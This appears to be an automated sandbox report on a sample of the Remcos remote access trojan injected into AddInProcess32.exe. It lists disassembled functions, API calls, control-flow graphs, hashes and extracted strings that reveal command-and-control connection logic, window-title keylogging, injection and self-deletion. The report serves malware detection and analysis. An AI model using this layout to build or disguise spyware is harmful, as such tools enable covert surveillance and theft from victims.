                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$ComputerUser
                                                                                                • String ID:
                                                                                                • API String ID: 4229901323-0
                                                                                                • Opcode ID: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                                                                                • Instruction ID: 96a0ba9ffe47efa01ac310f3847ceb2d7b3b0148e4494d8e74ae155582b6cc75
                                                                                                • Opcode Fuzzy Hash: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                                                                                • Instruction Fuzzy Hash: 9E014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E888BA8
                                                                                                Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,00475A10,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                Function 0040EA00 Relevance: 70.8, APIs: 15, Strings: 25, Instructions: 795COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 88 40ec47-40ec49 80->88 89 40ec4e-40ec55 80->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 103 40ec67-40ec69 94->103 104 40ec6e-40ec72 94->104 98->80 124 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->124 103->104 108 40ecb1-40ecc4 call 401e65 call 401fab 104->108 109 40ec74 call 407751 104->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 118 40ec79-40ec7b 109->118 121 40ec87-40ec9a call 401e65 call 401fab 118->121 122 40ec7d-40ec82 call 407773 call 40729b 118->122 121->108 141 40ec9c-40eca2 121->141 122->121 157 40f3e0-40f3ea call 40dd7d call 414f65 124->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 202 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->202 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 233 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->233 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 192 40ee59-40ee7d call 40247c call 434829 182->192 183->192 210 40ee8c 192->210 211 40ee7f-40ee8a call 436f10 192->211 202->178 216 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 210->216 211->216 271 40eede-40ef03 call 434832 call 401e65 call 40b9f8 216->271 286 40f017-40f019 233->286 287 40effc 233->287 271->233 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 271->288 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->233 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 356 40f194-40f1a7 call 401e65 call 401fab 347->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->357 368 40f207-40f21a call 401e65 call 401fab 356->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 426 40f31f-40f322 416->426 418->416 426->157 428 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 426->428 443 40f381-40f386 DeleteFileW 428->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->124 445->124 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                APIs
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 0040EA29
                                                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                • String ID: (TG$0SG$0SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$HSG$HSG$Inj$Remcos Agent initialized$Software\$User$`SG$del$del$exepath$licence$license_code.txt$tMG$RG$RG$RG$RG$RG
                                                                                                • API String ID: 2830904901-655123086
                                                                                                • Opcode ID: 028ef4fbd8a9c70fb27beb0cb4579416cf0a642db9cc0ded8a55f065ea43d688
                                                                                                • Instruction ID: 744eeac4272eceb7f63ef51a6efbfa797c3f505d1bd04c543663c5f487e0f2b9
                                                                                                • Opcode Fuzzy Hash: 028ef4fbd8a9c70fb27beb0cb4579416cf0a642db9cc0ded8a55f065ea43d688
                                                                                                • Instruction Fuzzy Hash: 7D32D860B043416BDA14B7729C57B6E26994F80748F40483FB9467F2E3EEBD8D45839E
                                                                                                Function 00414F65 Relevance: 39.3, APIs: 5, Strings: 17, Instructions: 809sleepnetworkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 567 415220-415246 call 402093 * 2 call 41b580 560->567 568 41524b-415260 call 404f51 call 4048c8 560->568 584 415ade-415af0 call 404e26 call 4021fa 561->584 567->584 583 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 568->583 568->584 648 4153bb-4153c8 call 405aa6 583->648 649 4153cd-4153f4 call 401fab call 4135e1 583->649 596 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 584->596 597 415b18-415b20 call 401e8d 584->597 596->597 597->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-415a45 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->656 655->656 901 415a4a-415a51 656->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->584
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,00000029,00475300,004750F4,00000000), ref: 00414FB6
                                                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                • Sleep.KERNELBASE(00000000,00000002), ref: 00415B12
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                                • String ID: | $%I64u$5.2.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$HSG$TLS Off$TLS On $`SG$hlight$name$tMG$RG
                                                                                                • API String ID: 524882891-382842652
                                                                                                • Opcode ID: 271b0cbc9598d3a17c324926429737543c5586e256268ea2e4bd51e566f127eb
                                                                                                • Instruction ID: d8c825886b0a0d8326cbfb5c9d4cc5050fd80dde9ad4bcb2ea62c87b00a1b781
                                                                                                • Opcode Fuzzy Hash: 271b0cbc9598d3a17c324926429737543c5586e256268ea2e4bd51e566f127eb
                                                                                                • Instruction Fuzzy Hash: 03526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                                                                Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: 213583cefde537503fd6ad8566cb64c1784dcb87914e3c10d304950ab1e6b0a8
                                                                                                • Instruction ID: d7ad8a6a5323ad03425d5def7d05b30a9c8ce31cd4ccd690c712fe6c843f15aa
                                                                                                • Opcode Fuzzy Hash: 213583cefde537503fd6ad8566cb64c1784dcb87914e3c10d304950ab1e6b0a8
                                                                                                • Instruction Fuzzy Hash: AD41E8B575060277C61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                                                                Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                                                Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0040AD7E
                                                                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                • API String ID: 911427763-3954389425
                                                                                                • Opcode ID: d377345d78a366808be41412e7b290511f9ac2305150b6ff54f5f13d0d680043
                                                                                                • Instruction ID: 1462e2e3b317a3feaa81e481452c264ee2198f2d95b6ea563507fc8e19ff55dc
                                                                                                • Opcode Fuzzy Hash: d377345d78a366808be41412e7b290511f9ac2305150b6ff54f5f13d0d680043
                                                                                                • Instruction Fuzzy Hash: 7F51E1716043419BC714FB62D846AAE7795AF84308F10093FF546A22E2EF7C9D44C69F
                                                                                                Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1097 40da6f-40da94 call 401f86 1100 40da9a 1097->1100 1101 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1097->1101 1103 40dae0-40dae7 call 41c048 1100->1103 1104 40daa1-40daa6 1100->1104 1105 40db93-40db98 1100->1105 1106 40dad6-40dadb 1100->1106 1107 40dba9 1100->1107 1108 40db9a-40db9f call 43c11f 1100->1108 1109 40daab-40dab9 call 41b645 call 401f13 1100->1109 1110 40dacc-40dad1 1100->1110 1111 40db8c-40db91 1100->1111 1122 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1101->1122 1123 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1103->1123 1124 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1103->1124 1113 40dbae-40dbb3 call 43c11f 1104->1113 1105->1113 1106->1113 1107->1113 1119 40dba4-40dba7 1108->1119 1131 40dabe 1109->1131 1110->1113 1111->1113 1125 40dbb4-40dbb9 call 409092 1113->1125 1119->1107 1119->1125 1136 40dac2-40dac7 call 401f09 1123->1136 1124->1131 1125->1101 1131->1136 1136->1101
                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DBD5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-425784914
                                                                                                • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                                                                Function 0040A761 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040A77B
                                                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNELBASE(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 0040A7B7
                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 0040A7C8
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040A7DF
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                • String ID: HSG$HSG
                                                                                                • API String ID: 3795512280-2729845973
                                                                                                • Opcode ID: 95e1188c70c2f0aca1c1fb60b6c909fd9fd4bcc360802c31494b417a9d188160
                                                                                                • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                                                                                • Opcode Fuzzy Hash: 95e1188c70c2f0aca1c1fb60b6c909fd9fd4bcc360802c31494b417a9d188160
                                                                                                • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E
                                                                                                Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1341 41c482-41c493 1342 41c495-41c498 1341->1342 1343 41c4ab-41c4b2 1341->1343 1345 41c4a1-41c4a9 1342->1345 1346 41c49a-41c49f 1342->1346 1344 41c4b3-41c4cc CreateFileW 1343->1344 1347 41c4d2-41c4d7 1344->1347 1348 41c4ce-41c4d0 1344->1348 1345->1344 1346->1344 1350 41c4f2-41c503 WriteFile 1347->1350 1351 41c4d9-41c4e7 SetFilePointer 1347->1351 1349 41c510-41c515 1348->1349 1353 41c505 1350->1353 1354 41c507-41c50e CloseHandle 1350->1354 1351->1350 1352 41c4e9-41c4f0 CloseHandle 1351->1352 1352->1348 1353->1354 1354->1349
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
